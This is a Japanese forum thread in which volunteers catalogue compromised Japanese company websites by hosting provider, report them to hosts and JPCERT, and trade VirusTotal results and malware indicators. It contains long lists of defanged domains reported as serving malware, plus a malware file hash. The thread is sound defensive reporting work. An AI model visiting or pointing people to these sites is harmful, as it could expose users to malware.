あと上流のISPの中にも下流に関して手を触れないのがあるのは困りもの
危険なサイトなのでつーほーめるそのものがフィルタリングされちゃうんだから
受け取ったら責任を持って下流にも伝えるべっきー
>>276 お疲れ様ですお疲れ様です
279 :
【吉】 :2013/08/01(木) NY:AN:NY.AN
イベントセミナー情報 緊急開催!【開催日時】2013/08/06 14:30〜16:00(受付開始14:15) jp.trendmicro.com/jp/events/detail/20130717001103.html 「90分でわかる、多発するWeb改ざん事件と、なりすまし不正ログイン、 脆弱性悪用による情報漏えい事件の解説と対策」
282 :
名無しさん@お腹いっぱい。 :2013/08/09(金) NY:AN:NY.AN
GMOもだめですねー bio-pf●co●jp kyuhaisui●jp/ humans●co●jp 配下のページ p-web●co●jp takarakuji-ataru●com/ coach-take●com/
お疲れ様です
>>282 一番二番発射
くこでリタイヤ m(_ _)m
ι(´Д`υ)アツィー
284 :
名無しさん@お腹いっぱい。 :2013/08/10(土) NY:AN:NY.AN
何度申告しても対処しないサイト crystalj●co●jp/ canonet n-washington●co●jp/ canonet pazuru●co●jp/ canonet saitokoumuten●co●jp/ canonet officekens●co●jp/ CPI nakamura-kogyo●co●jp/ CSIDENET belleohtsu●co●jp/ GMO chemi-cal●co●jp/ GMO generic-shinnei●co●jp/ GMO jamsoftware●co●jp/ GMO ayabekikou●co●jp/ NTTPC popup●co●jp/ NTT-PC fujiken2464●co●jp/ OCN gysekkei●co●jp/ ride
285 :
名無しさん@お腹いっぱい。 :2013/08/10(土) NY:AN:NY.AN
neurosystem●co●jp/kozukai/ sakura life-ac●co●jp/ smileserver issaku●co●jp/zen_issaku/shinosaka/ vectant foods-dream●co●jp/ Verio eight-s●co●jp/ デジロック nabeya-zakka●co●jp/file/slideshow/ ファーストサーバー ishiko●co●jp/ 大塚商会 ishitabi●co●jp/ 大塚商会
>>282 @ bio-pf●co●jp
>>272 A
A kyuhaisui●jp/
>>272 B
B humans●co●jp 配下のページ
>>272 F
C p-web●co●jp
>>272 H
D takarakuji-ataru●com/
>>272 L
E coach-take●com/
>>272 N
>>283 乙ですー
GMOからのメールによれば現在進行形であり対応完了してはいない旨の認識はあるようなので生温かく見守ってあげてください
>>284 @鯖が見つかりません(対応済のもより)
A休日のもよりなので営業日に凸予定
B現在凸中
CANONET は8/10〜8/18までお休みなのでw
>>284 Dofficekens●co●jp/
>KEN'Sは、業務サポート専門会社です
笑わせるんじゃありませんよ
把握してるから、対応中だから何だというのでしょうね
偉そうな物言いや電話を切るような輩はクタバレばいいと思いますね
本当に対応してるなら、そんなもの3秒で完了するっしょw
お盆が明けるまでは打つ手がないもよりですが この状況でどうするかを思案するのもまた一興w
ググって踏んでも真っ白だったり開かないのはこれのせいだったのか
>>285 Alife-ac●co●jp/
所有会社に連絡
いい感じでした
>>284-285 【努力】の「ど」作戦終了
明日からゆるゆると&
お盆明け以降は通常フローでガンガル
>>286 の
>>284 Bpazuru●co●jp/
情報だけ貰って閉鎖をしておきながら
当店は元々HPを持ってないとぶっこきくさって
更に警察に通報しくさった馬鹿女&店長
お前達には天罰が下るはず…といっておきますよんw
>>291 間違えたので訂正です
>>286 の
>>284 Bpazuru●co●jp/ ← 間違えたので訂正し謝罪いたします
>>285 Enabeya-zakka●co●jp/file/slideshow/ ← こっちでした
疲れてるなら休もうそうしよう
自分は大体レンタル元に直接連絡するわ サイト管理者で対応できる人もいるけどそうじゃない場合非常にめんどいし レンタル元なら安全第一でサイト停止等の行動をしてくれる レンタル元がダメなときはJPCERTに投げちゃう
295 :
名無しさん@お腹いっぱい。 :2013/08/11(日) NY:AN:NY.AN
d
297 :
名無しさん@お腹いっぱい。 :2013/08/11(日) NY:AN:NY.AN
▼GMO CLOUD www●tokyo-suidouya●jp/ zero-edit●com/ ips●vc/ kyuhaisui●jp/ belleohtsu●co●jp/ bio-pf●co●jp
298 :
名無しさん@お腹いっぱい。 :2013/08/11(日) NY:AN:NY.AN
>>269 いまだに2ちゃんで「香具師」という言葉を使っている
原始人みたいな人もいるんだなw
なべやさん お前達が頼みの綱の中原警察は、今日乗り込んで完全にしめてきましたよんw
いろいろと腹の立つことや納得できないこともありますが 修正されたり閉鎖されたりすることは、対応完了であり 勝利… なのではありまっするまっするw
神奈川県警なのが不安要素
みんなどうやって改竄されてるサイトを見つけてくることができるんだ? 俺ができる対策はテンプレとUrl.Voidやvirus totalで調べることくらいだけど
さて、どうしたものか。
DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTMtMDgxNi0yMzI3LTAxL2d3LmFndXNlLmpwLz9hZ3Vz
ZV91cmw9aHR0cCUzQSUyRiUyRnd3dyUyRXNpdGVhZHZpc29yJTJFY29tJTJGc2l0ZXMlMkZodHRw
JTI1M0ElMjUyRiUyNTJGaWNoaWd1JTI1MkVtZW1vcGFkJTI1MkVvcmclMjUyRmluZGV4JTI1MkVo
dG0NCg==
>>305 ぐぐる
>>306 ぐぐるって
まじでそんだけ?
まあ確かにグーグル先生は定評あるけど
以前はやほーさーちがダントツだった。 余りにも高性能すぎて、使うのに躊躇すたん。 今は孫やほーはぐぐる、本国※やほーはびーいんぐになったけど それぞれ元となった検索サービスにはあったせーふぶらうじんぐ(警告)が無くて一般人が使うには(ry ぐぐる > このサイトはコンピュータに損害を与える可能性があります。 びーいんぐ > コンピューターに被害を与えるおそれのある、悪意のあるソフトウェアがダウンロードされる可能性があるため、このサイトへのリンクが無効になりました。
あと、このスレ1から読むとそのものずばりのがあるよん 200レスぐらい読もー
310 :
名無しさん@お腹いっぱい。 :2013/08/17(土) NY:AN:NY.AN
NTTPC jisyubo●co●jp/ sign-s●co●jp/ stork●co●jp/t_sakuraba/album/ tokiwakaigo●co●jp/ vtc●co●jp/seminer/china_tettai/
>>305 鑑定関連スレが2chにはいくつかあるが
そこに張り付いているとたま〜にだけど新種にやられたサイトに出会える
312 :
名無しさん@お腹いっぱい。 :2013/08/17(土) NY:AN:NY.AN
グーグルさんは確かに危険サイトに良く反応するけど 脅威がないサイトも良く検出する(いわゆる誤反応)
313 :
名無しさん@お腹いっぱい。 :2013/08/17(土) NY:AN:NY.AN
▼canonet shinko-engineer●co●jp/ shouwa-lab●co●jp/ straightword●co●jp/ ▼CPI re-media●co●jp/user/trust_onoda/ seiwa-trading●co●jp/ stylecars●co●jp/ ▼GMO hinokilab●co●jp/ ten-on●co●jp/ wakana-fc●co●jp/
314 :
名無しさん@お腹いっぱい。 :2013/08/17(土) NY:AN:NY.AN
▼GMOcloud ach●co●jp/ shin-ei-net●co●jp/ 配下のページ全て sigakuin●co●jp/ 配下のページ全て wakaki●co●jp/ ▼inforyoma www●e-tokushima●co●jp/vw/ 配下のページ ▼Joe'sウェブホスティング www●abe-auto●co●jp/ www●aizen-p●co●jp/recruit/ wingfoot●co●jp/ 配下のページ全て takarabe-hrj●co●jp/clock/ takarabe-hrj●co●jp/images/ sunfoods-o●co●jp/
315 :
名無しさん@お腹いっぱい。 :2013/08/17(土) NY:AN:NY.AN
▼LOLIPOP negizen●co●jp/ shintendo●co●jp/ ▼Nifty fujii-kensetsu●co●jp/ ▼vectant issaku●co●jp/zen_issaku/shinosaka/
▼canonet
>>284 @ABC
>>313 @AB
0367327573に連絡(すでに対応済のところもありましたが)
メアドを聞き出しました
[email protected] 今回はjpサート経由で既に連絡があったそうです
jpサートに連絡した方乙です
多分他のところにも連絡したんじゃないのかなと思われるので
他の残権は連絡済とみなし様子見とします
てすと
復帰カキコ
つーほーしたのは404だけど直ってなかた。。。orz.........
>>325
328 :
名無しさん@お腹いっぱい。 :2013/09/08(日) 09:57:48.32
www1●ocn●ne●jp/~animal30/ www1●ocn●ne●jp/~kandn/ www3●ocn●ne●jp/~orange_t/ www4●ocn●ne●jp/~kyowa●k/ www6●ocn●ne●jp/~morizen/ www8●ocn●ne●jp/~chateau/ www8●ocn●ne●jp/~b-jack/ iidazeirishikai●jp/ whitecube●org/ fujinosato●co●jp/ amakusa-princehotel●jp/ loftjazz●jp/ 60●43●234●181/
>>328 @-GI-Locnフォーム発射完了
Hgmoフォーム発射完了
/counter●php
/washi/
↑こりも
333 :
名無しさん@お腹いっぱい。 :2013/09/12(木) 20:47:11.78
\(^o^)/オワタ
>>332 Officeさんの件があったからダメだよなあ
335 :
/名無しさん[1-30] ◆.htmlXG20g :2013/09/14(土) 23:02:17.81
ふっきっき
336 :
/名無しさん[1-30] ◆.htmlXG20g :2013/09/28(土) 14:39:44.83
> このサイトは第三者によってハッキングされている可能性があります。 ぐぐるの警告半端無い
さげてなかた。。。orz.........
>>336 えーご
> This site may be hacked.
改竄されたサイトから「iPhone Spy」とかゆーとこに誘導されるもより なんじゃこりゃ
>>338 url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381308816/
BitDefender Malware site
>>338 url/61ec0f9846661b7ab25e308baccea51a3d71f80a8891f5bf299be50a90b2290d/analysis/1381465075/
SecureBrain Malicious site
さくらにつーほ
受理済み
>>339 url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381310213/
url/3cbfd28e6c8dcebc9e593232e5baf0211280926566e6afc2d6f401a0e502b77b/analysis/1381465686/
Detection ratio: 2 / 38
BitDefender Malware site
CLEAN MX Suspicious site
Sophos Malicious site
windowcpu●com/
Dr.Webがぴこーんだけどわからんちん。。。orz.....
とりあえずめも DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTMtMTAxMS0yMzQ0LTAwL29ubGluZS5kcndlYi5jb20v cmVzdWx0Lz91cmw9aHR0cCUzQSUyRiUyRndpbmRvd2NwdSUyRWNvbSUyRg0KaHR0cDovL21lZ2Fs b2Rvbi5qcC8yMDEzLTEwMTItMDAwMy0xNi93d3cuZGFuLmNvLnVrL3ZpZXdzb3VyY2UvaW5kZXgu cGhwP3VybD1odHRwJTNBJTJGJTJGd2luZG93Y3B1JTJFY29tJTJGcG9saWN5JTJFcGhwDQo=
肝心なもの url/20d990d7f97376b482ffe32cf29772c7c2f93ab89fbc7bca87d792cb9c4e4eec/analysis/1381504300/
348 :
名無しさん :2013/10/13(日) 05:54:17.50 ID:???
>>347 おつかれー
WordPress 3.1.2か・・・
352 :
名無しさん :2013/10/13(日) 15:25:59.06 ID:???
結構古い改ざんぽいね 最終変更日わからなかったけどアクセス元ごとに振り分けとか関係なく無くなってそう 今後も改ざんの可能性はあるので要対応ではありますが・・・ WordPressを簡単にインストールできてかっこいいサイト作れます!みたいに紹介するのは危ないね こういうところだと自称ぱそこん得意な担当者がいなくなったらどうしようもない
356 :
名無しさん :2013/10/15(火) 00:19:26.75 ID:???
iframeは消したみたいだけどWordPress更新はできてないような・・・
どこもそーなんです。WordPress 3.2.1
>>325 CMSのバージョンアップの要望はテンプレ化してます>つーほーメル
スパムフォルダに入っていて今まで気付かなかったんだけど……
Subject : Mail box full
> 下記のメールは受信者[*************@*************] のメールボックスが満杯により受信できませんでした。
>>347 現在404
参加企業・団体 | ACTIVEについて | Advanced Cyber Threats response InitiatiVE(ACTIVE)
http://www.active.go.jp/active/group.html > マルウェア収集・駆除のための技術支援
> NTTコムテクノロジー株式会社
> NRIセキュアテクノロジーズ株式会社
> エヌ・ティ・ティ・コムチェオ株式会社
> エヌ・ティ・ティ・ソフトウェア株式会社
> エヌ・ティ・ティラーニングシステムズ株式会社
> エヌ・ティ・ティレゾナント株式会社
> 株式会社FFRI
> 株式会社カスペルスキー
> 株式会社日立製作所
> トレンドマイクロ株式会社
> 日本電信電話株式会社
> 日本マイクロソフト株式会社
> マカフィー株式会社
シマンテックや富士通研究所がないのはなぜー
熱いバージョンだね
366 :
名無しさん@お腹いっぱい。 :2013/10/19(土) 16:33:55.34
何度申告しても復旧しないサイト sumai-core●co●jp/cf_cgi2/yoyaku●htm canonet tamarubiken●co●jp/ CPI hanagoromo●co●jp/ estore hanagoromo●co●jp/Scripts/AC_RunActiveContent●js estore www●iwadatehobby●co●jp/link/oshiharai●htm estore www●gran-mare●co●jp/siki●html GMO www●sansei-motors●co●jp/aaaaa●htm GMO milka●co●jp/ GMOクラウド nikkan-t●co●jp/ heteml
367 :
名無しさん@お腹いっぱい。 :2013/10/19(土) 16:36:08.85
www●noncra●co●jp/download/ KDDI www●ogb●co●jp/ KDDI www●tokaiseisaku●co●jp/ 配下のページ全て KDDI www●tokaiseisaku●co●jp/ 配下の全ページ KDDI maru-sin●co●jp/cgi/update/ NTTPC maru-sin●co●jp/cgi/update/ NTTPC tdk-takahashidenki●co●jp/ NTTPC nagoyagiken●co●jp/Scripts/AC_RunActiveContent●js NTTPC nagoyagiken●co●jp/js/rollover●js NTTPC
368 :
名無しさん@お腹いっぱい。 :2013/10/19(土) 16:38:16.17
sanpei-kk●co●jp/ OCN indoor●co●jp/Scripts/AC_RunActiveContent●js OCN www●socome●co●jp/ Plala alcc●co●jp/ sakura akcorp●co●jp/ アルテック株式会社 paso-common●co●jp/ インターリンク www●servenet●co●jp/hp/edingstudio/ エクスプレスコミュニケーションズ株式会社 lovephoto●co●jp/ ファーストサーバ wanchan●co●jp/ ファーストサーバー www●aizen-p●co●jp/recruit/tyuuto_1/ フューチャリズム ワークス presin●co●jp/ ライド
369 :
名無しさん@お腹いっぱい。 :2013/10/19(土) 16:40:48.38
aid-ele●co●jp/ の404-not found画面 ライド株式会社 www●if-home●co●jp/ の404-not found画面 リコーテクノシステムズ www●izu●co●jp/~ybrain/ 伊豆急ケーブルネットワーク www●etranger●co●jp/brand/import/nava/nava●html 株式会社DO-NET www●nctv●co●jp/~ishiwata/ 株式会社カイクリエイツ e-yuuai●co●jp/ 配下のページ全て 大塚商会 www●izu●co●jp/~ybrain/
366のドメイン4番目までつーほ 玄界灘 orz........
なんか、ため息が… まぁ、ぼちぼちとやりますっるわ
367の4まで一応連絡済 367の5-9のNTTPCには連絡窓口の確認中 何故かInfoSphereからの着信履歴が 連絡窓口はnfoSphereっぽい、かな 残件もろもろぼちぼちと奮闘中、なのだー
既出かもしれませんが、インターネットエクスプローラーやfriefoxを使おうとすると検索画面の下に新しいバージョンがありますみたいな表示がガタガタなってます 無視して検索しようとすると無理やりアップデートの画面へもってかれるので、多分本当のアップデートではなく詐欺というかウイルスに引っかかってるんだと思います もし同じ症状になっている人は対策教えてほひしいです 説明わかりづらくてすいません。パソコンのことは詳しくないのでうまい言葉選びができません
>>369 の3 まで
尚、2 に付いてはリコーからの連絡待ち
ここまで、残件なし
>>383 おつです
My Documentsさんェ・・・
shim.gifなどIE向けと思われる仕込まれ方みたいだね
コメント笑ってしまった
aguse gatewayで8つのファイルをHEUR:Trojan.Script.Genericと検出したよ
386 :
名無しさん@お腹いっぱい。 :2013/11/08(金) 22:09:16.90
www●speedway●ne●jp/~genmaru/ www●speedway●ne●jp/~hotrock/ 配下の全ページ www●speedway●ne●jp/~i-nokai/ www●speedway●ne●jp/~saburo/
ツタヤディスカスのHPもやられてない?
>>388 私には分からないけど、あやしいかも
>>386 再発
>>JCTV いばらき中央テレビspeedwayの中の人
なんだかなーって感じっすよ
まだ残ってると思ったら再発なのか Last-Modified変わってないなあ
ほとんどの場合、リダイレクト先は停止しているが(実害はない) これは現時点で稼動している
一時停止中に確認したけど差分わからなくてそのまま戻したのかな ソース取ってなかったけど72行目ポーランドなのとLast-Modifiedが変わってなかったのは見た
396 :
名無しさん@お腹いっぱい。 :2013/11/25(月) 11:00:05.33
iframeの中になんちゃらかんちゃらstats.php?id=なんちゃらってのがうめこまれてるんだけど、連絡しといたほうがいいかな?
そうだね そのサイトの人に直接言ってもわからないだろうからレンタル元とかに投げたほうがいいよ
Webサイトの改ざんが1年で6000件超 itpro.nikkeibp.co.jp/article/COLUMN/20140110/529283/ 激増するウェブサイト改ざんの手口-2014年1月10日 www.yomiuri.co.jp/net/security/goshinjyutsu/20140110-OYT8T00870.htm CSIRT・日本シーサート協議会 www.nca.gr.jp/ 2013年3月から継続している国内 Web サイトのページ改ざん事案について-2014.01.06 www.nca.gr.jp/2013/web201303/index.html
大手出版社でサイト改ざん、マルウェア感染サイトへ誘導 - シマンテックが確認 engawa.2ch.net/test/read.cgi/poverty/1389781695/
>>399 角川らしいけど、ガンブラーとかと同じ?
【注意】 角川HP改ざん 閲覧者PCウイルス感染の恐れ 今月7日〜8日 hayabusa3.2ch.net/test/read.cgi/news/1389875112/ 角川のHPが改ざんされ、閲覧者のネットバンキングのIDとパスが盗まれていたことを隠してました engawa.2ch.net/test/read.cgi/poverty/1389875226/ www.symantec.com/connect/blogs/web-gongda www.symantec.com/connect/sites/default/files/users/user-2998361/figure1_6.png
stocks.finance.yahoo.co.jp/stocks/profile/?code=9477.t 電話番号 03-3238-8401 ファイル名:gongda.exe 検出率:5 / 48 www.virustotal.com/ja/file/14eb6c967e64f46ffeafe6eb52dbdd5c5b95acbb2c5a11fcf94738180bca8316/analysis/
>>401 Infostealer.Torpplar
www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2014-010908-4722-99
すぐにチェックを - KADOKAWAのWebサイト改ざん被害、閲覧したPCに不正プログラム感染の危険性
news.mynavi.jp/articles/2014/01/17/security/
さくらのabuseの中の人が変わったっぽくて難儀しまぷ。。。orz.............
407 :
名無しさん@お腹いっぱい。 :2014/03/09(日) 09:29:25.39
NTTPCという会社は何度申告しても対処をしません。 www●skc●ne●jp/ naoyukifujii●net/l_live_elcamino●html www●sennen-braid●com/ hong●jp/ www●keiki●ne●jp/keiki/kinen/kinen_menu●htm
>>89 これをサッカー関連のスレに貼る人がいるんだけど
踏むと、どうなる?
無問題
411 :
名無しさん@お腹いっぱい。 :2014/07/04(金) 09:39:24.15
esn●co●jp/
412 :
名無しさん@お腹いっぱい。 :2014/07/04(金) 09:40:06.38
esn●co●jp/
> Hello, > > I'm sorry, but we're only able to correspond in English. Please reply to this message in English if you can--a local library or university may offer translation services, or you can look for a translation service online. > > We look forward to hearing from you. > > Best regards, > > Amazon Customer Support ニポーン人なら海外鯖使わないで><;
http://kanae.2ch.net/test/read.cgi/sec/1370942055/318 エンドースメント一覧
米国NCFTA
NEC(日本電気株式会社)
NRIセキュアテクノロジーズ株式会社
セコム株式会社
デロイト トーマツ リスクサービス株式会社
トレンドマイクロ株式会社
株式会社ラック
御賛同いただいている企業・機関・研究者
NEC(日本電気株式会社)
NRIセキュアテクノロジーズ株式会社
セコム株式会社
デロイト トーマツ リスクサービス株式会社
トレンドマイクロ株式会社
株式会社日立製作所
株式会社ラック
株式会社みずほ銀行
株式会社三井住友銀行
株式会社三菱東京UFJ銀行
株式会社ゆうちょ銀行
楽天株式会社
株式会社インフォセック
S&J コンサルティング株式会社
株式会社FFRI
株式会社サイバーディフェンス研究所
情報セキュリティ大学院大学
首都大学東京 教授 星 周一郎
東京電機大学 教授 安田 浩
警察庁
420 :
名無しさん@お腹いっぱい。 :2015/02/22(日) 07:08:25.92
sniper elite v2ってゲームでmodが無いかなあとググっていたらおかしなことになっている(なっていた)サイトがチラホラあるんだけど これって改ざん? 検索ワード sniper elite v2 mod 検索結果に明らかにゲームに関係のない寺や介護センターのサイトが幾つか出てきて何だろうと見てみたらそのまんまでは何も表示されず ソースにも何も無いけど、グーグルキャッシュを見ると1月あたりにおかしなことになっていたサイトがチラホラ urlに含まれる妙なアドレスの一部でググルと他にも色々
お疲れ様です。 跡地確認>介護センター サイト内検索ではOracle、Samsung Galaxy、Adobe Flash Player、Xbox 360等々 404ばかりなので対応済みの模様。 踏み台になってたようです。 # 3月3日以降どーしよう
ありゃ、環境によって404や真っ白。 このサイトのデフォルト404と違う。